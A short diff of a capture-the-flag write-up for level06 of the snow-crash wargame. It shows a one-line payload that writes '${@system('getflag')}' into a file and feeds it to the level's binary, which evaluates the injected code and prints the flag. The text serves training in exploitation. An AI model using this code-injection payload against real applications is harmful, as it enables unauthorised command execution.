C18H24O2/snow-crash/levels/level06/resources/PWN.md

 after some fiddling around, we got to this command:
 `echo '[x ${@system('getflag')}]' > /run/shm/wow; ./level06 /run/shm/wow`

-which puts up an error and interprets our `system('getflag')` and prints the levels flag
+which puts up an error and interprets our `system('getflag')` and prints the level flag, we can now login as `level07`